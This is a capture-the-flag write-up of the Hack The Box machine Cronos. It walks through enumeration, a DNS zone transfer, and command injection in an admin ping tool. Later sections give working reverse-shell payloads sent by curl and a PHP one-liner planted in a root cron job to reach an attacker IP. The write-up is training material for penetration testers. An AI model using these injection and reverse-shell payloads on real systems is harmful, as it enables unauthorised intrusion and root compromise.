Cronos (10.10.10.13)

After running our port scans we find three open ports. The box is running SSH, a DNS server, and a webserver. 

root@kali:~# nmap -sSVC -p- 10.10.10.13

 PORT   STATE SERVICE VERSION
 22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
 | ssh-hostkey:
 |   2048 18:b9:73:82:6f:26:c7:78:8f:1b:39:88:d8:02:ce:e8 (RSA)
 |   256 1a:e6:06:a6:05:0b:bb:41:92:b0:28:bf:7f:e5:96:3b (ECDSA)
 |_  256 1a:0e:e7:ba:00:cc:02:01:04:cd:a3:a9:3f:5e:22:20 (ED25519)
 53/tcp open  domain  ISC BIND 9.10.3-P4 (Ubuntu Linux)
 | dns-nsid:
 |_  bind.version: 9.10.3-P4-Ubuntu
 80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
 |_http-server-header: Apache/2.4.18 (Ubuntu)
 |_http-title: Apache2 Ubuntu Default Page: It works
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Now that we have a list of open ports and what services each one is running we need to enumerate each one further and determine which one is going to be our initial way in. SSH is probably not going to be our initial way in unless we discover credentials while enumerating another service. A quick search using searchsploit reveals there is a vulnerability in OpenSSH 7.2p2 that would allow for checking whether a particular username exists. We will keep this in mind in case it becomes useful later.

Port 80 (HTTP) is usually interesting and often opens a number of opportunities for further enumeration. Let’s first navigate to the web page in a browser. We are greeted with an Apache default page.

Since we only get a default page when browsing to the page using the machine’s IP address, we may want to consider that there could be virtual host routing in play. If we edit our /etc/hosts file to add the machine’s name cronos.htb and then revisit the page we now get a different page:

Taking a look at the links on this page they are all linking off the site and are out of scope. It appears the site is running Laravel a PHP web framework. Taking a look at the source for the page as well as browsing to http://cronos.htb/robots.txt doesn’t yield anything particularly interesting. We will want to do further vulnerability research on Laravel and try to find the version running and see if there is anything we can exploit. In the meantime, let’s kick off nikto and gobuster. 

root@kali:~# gobuster dir -u http://cronos.htb -w /usr/share/seclists/Discovery/Web-Content/raft-large
 -directories.txt                                                                                      
 Gobuster v3.0.1
 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@FireFart)
 [+] Url:            http://cronos.htb
 [+] Threads:        10
 [+] Wordlist:       /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
 [+] Status codes:   200,204,301,302,307,401,403
 [+] User Agent:     gobuster/3.0.1
 [+] Timeout:        10s
 2019/12/25 13:14:41 Starting gobuster
 /js (Status: 301)
 /css (Status: 301)
 /server-status (Status: 403)
root@kali:~/hackthebox/cronos-10.10.10.13# nikto -h cronos.htb
 - Nikto v2.1.6
 Target IP:          10.10.10.13
 Target Hostname:    cronos.htb
 Target Port:        80 
 + Start Time:         2019-12-25 13:15:02 (GMT-5)
 Server: Apache/2.4.18 (Ubuntu)
 The anti-clickjacking X-Frame-Options header is not present.
 The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
 The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
 Cookie XSRF-TOKEN created without the httponly flag
 No CGI Directories found (use '-C all' to force check all possible dirs)
 Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
 Allowed HTTP Methods: GET, HEAD 
 OSVDB-3092: /web.config: ASP config file is accessible.
 OSVDB-3268: /css/: Directory indexing found.
 OSVDB-3092: /css/: This might be interesting…
 OSVDB-3233: /icons/README: Apache default file found.
 7785 requests: 0 error(s) and 10 item(s) reported on remote host 
 + End Time:           2019-12-25 13:20:45 (GMT-5) (343 seconds)
 1 host(s) tested

Since we’re not seeing anything jump out at us right away, now would be a good time to take a step back and review the other services we haven’t enumerated yet. Let’s explore DNS and see if we can do a zone transfer for the cronos.htb domain.

root@kali:~# host -l cronos.htb 10.10.10.13
 Using domain server:
 Name: 10.10.10.13
 Address: 10.10.10.13#53
 Aliases: 
 cronos.htb name server ns1.cronos.htb.
 cronos.htb has address 10.10.10.13
 admin.cronos.htb has address 10.10.10.13
 ns1.cronos.htb has address 10.10.10.13
 www.cronos.htb has address 10.10.10.13

This yields several additional host names we should add to our /etc/hosts file and check out. It turns out that http://ns1.cronos.htb takes us to the default Apache page and http://www.cronos.htb takes us to the same page as just http://cronos.htb so those aren’t anything new. However, when we go to http://admin.cronos.htb we are greeted with a login page!

After trying some common default usernames and passwords we don’t get in. Let’s try running gobuster against admin.cronos.htb. We will use a different dictionary (one from dirbuster) and also let’s specify some specific extensions to try: ext, php, txt, bak. 

root@kali:~# gobuster dir -x txt,bak,ext,php -u http://admin.cronos.htb -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt 
...
 /index.php (Status: 200)
 /welcome.php (Status: 302)
 /logout.php (Status: 302)
 /config.php (Status: 200)
 /session.php (Status: 302)
 /server-status (Status: 403)

We’ve discovered some new interesting pages! Let’s fire up Burp Suite and manually poke around at these pages. When we navigate to http://admin.cronos.htb/welcome.php it immediately redirects us to http://admin.cronos.htb/index.php and the familiar login page. However, we notice something interesting when we examine the request in Burp.


Even without logging in we are able to see the page is some sort of tool that allows you to run traceroute or ping. This suggests that we may want to look for a command injection vulnerability. We can use curl to send a HTTP POST request passing the command & host parameters and see if we can add a semicolon followed by a command of our own. We will start up a netcat listener on our Kali box and see if we can trigger a connection to our machine as follows:

curl -d "command=traceroute&host=8.8.8.8;nc 10.10.14.4 8888" http://admin.cronos.htb/welcome.php

It worked! We were able to trigger a command injection vulnerability and get it to connect back to our machine. Now we will grab the PHP reverse shell from here: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet and attempt to get a shell on the box. We edit the reverse shell to use the IP address of our Kali box and port 8888. We then use https://www.urlencoder.org/ to urlencode it. After setting up the listener we issue our curl command as follows to get a reverse shell.

curl -d "command=traceroute&host=8.8.8.8;php%20-r%20%27%24sock%3Dfsockopen%28%2210.10.14.4%22%2C8888%29%3Bexec%28%22%2Fbin%2Fsh%20-i%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27" http://admin.cronos.htb/welcome.php

Now we have a reverse shell running under the context of the the www-data account. We can use wget to transfer over the LinEnum.sh script and then run it to attempt to identify avenues for privilege escalation. After running the script and examining the output we find an interesting cron job running under the root account. 

[-] Crontab contents:                                                                                     
 /etc/crontab: system-wide crontab
 Unlike any other crontab you don't have to run the `crontab'
 command to install the new version when you edit this file
 and files in /etc/cron.d. These files also have username fields,
 that none of the other crontabs do.
 SHELL=/bin/sh
 PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
 m h dom mon dow user  command
 17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
 25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )                                                                                                           
 47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )                                                                                                          
 52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )                                                                                                         
 * * * *       root    php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1

If we examine the /var/www/laravel/artisan file we see that we own it and can modify it! We can either replace or append php code to this file to trigger a root shell.

www-data@cronos:/$ ls -lh /var/www/laravel/artisan
  -rwxr-xr-x 1 www-data www-data 1.7K Apr  9  2017 /var/www/laravel/artisan
 www-data@cronos:/$

We will replace the file with a simple one line PHP script to send us a reverse shell on port 9999 as shown below. Afterwards, we setup a netcat listener and wait for our root shell to arrive. 

echo '<?php $sock=fsockopen("10.10.14.4",9999);exec("/bin/sh -i <&3 >&3 2>&3"); ?>' /var/www/laravel/artisan

Within a minute the cron job runs and we do our r00t dance 🙂

Related articles